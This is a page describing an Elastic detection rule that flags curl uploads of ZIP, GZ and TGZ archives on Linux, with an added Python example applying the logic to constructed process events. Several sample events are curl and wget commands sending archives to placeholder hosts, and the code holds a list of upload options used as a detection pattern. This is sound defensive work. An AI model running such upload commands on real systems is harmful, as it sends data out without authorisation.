
Potential Data Exfiltration Through Curl

Elastic Detection Rules

Summary
This detection rule, authored by Elastic, identifies potential data exfiltration on Linux systems via the 'curl' command. Threat actors often use 'curl' to upload archived files containing sensitive data to their command and control (C2) servers. The rule detects this behavior by monitoring process events for 'curl' executions whose arguments are commonly associated with file uploads (such as '-F', '-T', or the data options), and examines the process 'command_line' for patterns that indicate an attempt to send files over HTTP or HTTPS, targeting archive formats like ZIP, GZ, and TGZ. The rule operates on data emitted by Elastic Defend and requires the correct integration setup to capture all necessary events, in particular the proxy-related environment variables that may be involved in the upload. The behavior carries a medium risk score of 47 and is mapped to MITRE ATT&CK tactics and techniques related to data exfiltration.
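The following is an added example, not Elastic's published rule query, showing the detection logic the summary describes run over a handful of constructed process events: a 'curl' process whose command line combines an upload option, an archive extension (.zip, .gz, .tgz) and an http(s) URL is flagged, while plain downloads and non-archive uploads are not. The option list, the event field names and the sample events are assumptions made for the illustration; hosts and addresses use documentation/reserved values.

```python
import re
import shlex
from typing import Optional

# curl options that send local data or files in the request body.
# Assumption for this example; the rule's own option list is not reproduced here.
UPLOAD_OPTIONS = {
    "-F", "--form", "-T", "--upload-file",
    "-d", "--data", "--data-binary", "--data-raw", "--data-ascii", "--data-urlencode",
}
# Archive extensions named in the rule summary, and the HTTP/HTTPS scheme.
ARCHIVE_RE = re.compile(r"\.(zip|gz|tgz)\b", re.IGNORECASE)
URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)


def _option_name(token: str) -> Optional[str]:
    """Return the option a token starts with: '--data=@x' -> '--data', '-Fk=@x' -> '-F'.
    Tolerates combined short options and '--opt=value' spellings."""
    if token.startswith("--"):
        return token.split("=", 1)[0]
    if token.startswith("-") and len(token) > 1:
        return token[:2]
    return None


def is_curl_archive_upload(command_line: str) -> bool:
    """True when a curl command line shows an upload option, an archive name and a URL."""
    try:
        argv = shlex.split(command_line)
    except ValueError:  # unbalanced quotes: not parseable, leave it unflagged
        return False
    if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
        return False
    has_upload_option = any(_option_name(t) in UPLOAD_OPTIONS for t in argv[1:])
    return (has_upload_option
            and ARCHIVE_RE.search(command_line) is not None
            and URL_RE.search(command_line) is not None)


# Constructed sample process events (field names loosely follow ECS process.*;
# example.invalid and 203.0.113.0/24 are reserved documentation values).
SAMPLE_EVENTS = [
    {"host.name": "web-01", "process.name": "curl",
     "process.command_line": 'curl -F "file=@/tmp/backup.tgz" https://files.example.invalid/upload'},
    {"host.name": "db-02", "process.name": "curl",
     "process.command_line": "/usr/bin/curl -T /var/tmp/export.zip http://203.0.113.10:8080/"},
    {"host.name": "build-03", "process.name": "curl",   # download, not an upload
     "process.command_line": "curl -sSL https://example.invalid/setup.tar.gz -o setup.tar.gz"},
    {"host.name": "api-04", "process.name": "curl",     # upload, but not an archive
     "process.command_line": "curl --data-binary @report.json https://api.example.invalid/ingest"},
    {"host.name": "web-01", "process.name": "wget",     # not curl, out of scope for this rule
     "process.command_line": "wget --post-file=data.zip http://203.0.113.10/"},
]


def run_detection(events=SAMPLE_EVENTS):
    """Return (host, command_line) pairs the detection would alert on."""
    return [(e["host.name"], e["process.command_line"])
            for e in events
            if e.get("process.name") == "curl"
            and is_curl_archive_upload(e["process.command_line"])]


if __name__ == "__main__":
    for host, cmd in run_detection():
        print(f"ALERT [risk 47] {host}: {cmd}")
```

The three conditions are evaluated together on purpose: an upload option alone (event 4) or an archive name alone (event 3) is routine administrative traffic, and alerting on either by itself would generate noise; requiring all three keeps the signal aligned with the behavior the rule targets. In production the proxy-related environment variables mentioned above would be additional context on the event rather than a filter.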
Categories
  • Endpoint
  • Linux
  • Cloud
Data Sources
  • Process
  • Application Log
  • Network Traffic
ATT&CK Techniques
  • T1048
Created: 2025-04-29